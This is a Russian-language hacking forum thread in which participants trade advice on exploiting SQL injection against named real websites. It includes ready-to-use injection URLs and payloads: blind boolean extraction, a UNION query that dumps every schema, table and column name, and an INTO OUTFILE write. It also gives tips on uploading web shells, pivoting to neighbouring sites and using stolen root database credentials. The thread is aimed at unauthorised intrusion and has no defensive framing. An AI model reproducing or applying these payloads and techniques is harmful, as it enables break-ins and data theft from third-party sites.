Встречал пару раз такие случаи, попробуй вместо limit использовать where или having. Для having обязательное условие наличие колонки в group by
Наткнулся на roundcube при вставки логина пишет вот что: IMAP Error in /usr/local/www/apache22/data/roundcube/program/include/rcube_imap.php (205): Login failed for 'or''=' from 177.167.126.19. LOGIN: Login failed. можно что то сделать?
Помогите новичку: 1.На сайте есть скуля,раскрутил но в БД нету логина админа,где он может храниться? 2.Так же есть логин и пароль юзера(root@localhost) бд, но не знаю как подключиться(При переходе на site.com/PMA/ пришет 403 Forbidden(( и ниче сделать не могу ) . 3.У юзера бд File_Priv=Y,читать файлы могу, но некак не могу залить шелл,везде пишет Can't create/write to file '....' (Errcode: 13) Также на сайте имееться файл phpinfo.php . Может он что-то подскажет...
Можешь попробовать удаленно подключиться к БД, можешь найти относительный путь соседних сайтов и прям со скули залиться в них, если пасса нет в БД, но есть админка, прочитай исходники админки и посмотри откуда он берет данные от пасса. с такой скуляй много чего придумать можно, все по ситуации.
вот-эта чудо прога ломанула сервачок! надо мне её вычислить! для этого надо знать как она работает! верно?
В том то и дело,что я не могу подключиться к БД, но имею логин и пароль к БД. Может кто знает,как можно подключиться к БД удаленно. И еще один вопрос:где в линуксе может храниться входы в админку сайта?
подключится к бд можно тем же шеллом всо залитым на любой хост там есть клиент пассы на вход в админку могут быть где угодно в базе или в файле и от ос(линукс,вин)тут вообще не зависит
Хорошо,а если вход в пхпмайадмин по этой ссылке site.com/PMA/ то что в host писать ( site.com/PMA/ или site.com/ ? А где в Линуксе они хроняться?
в хост писать имя сайта но не всегда мускул находиться на том же сервере на пример на мастрехосте это другой сервер по этому лучше прочитайте конфиг какойнибудь если найдёте
привет всем есть SQL Inject, помогите раскрутить. Code: GET /junior/88/matches/stage/SQLInject/ HTTP/1.1 Referer: http://allhockey.ru:80/ На сайте фильтруются пробелы,все что пока получилось Code: /junior/88/matches/stage/'-1'UNION(SELECT(null),'<h1>test<h1>',3,4,(INTO(OUTFILE)'test.html))/ Подправьте, что не так или посоветуйте другие варианты
Каким образом можно создать площадку для проведения атаки на буфер обмена? Нужна именно страница с таким кодом (на PHP), чтобы при запросе с определённым значением происходило переполнение буфера, вследствии чего появлялась ошибка (403, 228 etc.). Проверка входящего запроса на наличие значение не пойдёт.
сайт.com/index.php?hl=ru&idd=cat&cat=' Добавив в конце кавычку выдало следующую ошибку: Code: Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT * FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id='' ORDER BY mbmproduct.name ASC LIMIT 0,9 Или всё-таки должно выдать You have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use near '1''
Вывод ошибок зависит от реализации выборки данных с бд, или конфигурации php. 1,2) or 1=1 order by 10000 -- w - что выдаст ?
Это слепая sql. Её бессмысленно крутить, только по-символьно вытаскивать данные - http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=1%29%20or%201=1%20and%20substring%28%28version%28%29%29,1,1%29=5%20%23w Если что-то равно чему-то, в данном случае, первый символ версии субд=5 - выведет каталог), если нет - пустоту. Или при лучших обстоятельствах сделать вывод мини-шелла в диру с сайтом при соответствующих привилегиях и правах.
Так еще можно сделать http://www.nova-plosha.com/index.php?idd=jobs&jobs=36'+and+1=0+union+select+1,2,3,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),5,6,7,8,9,10,11,12,13,14,15,16+--+
Та я сморю бессмысленно это URL-запрос в код "отражает" и всё.. P.S Но чувствую что там есть "дырочка", квалификации знаний не хватает
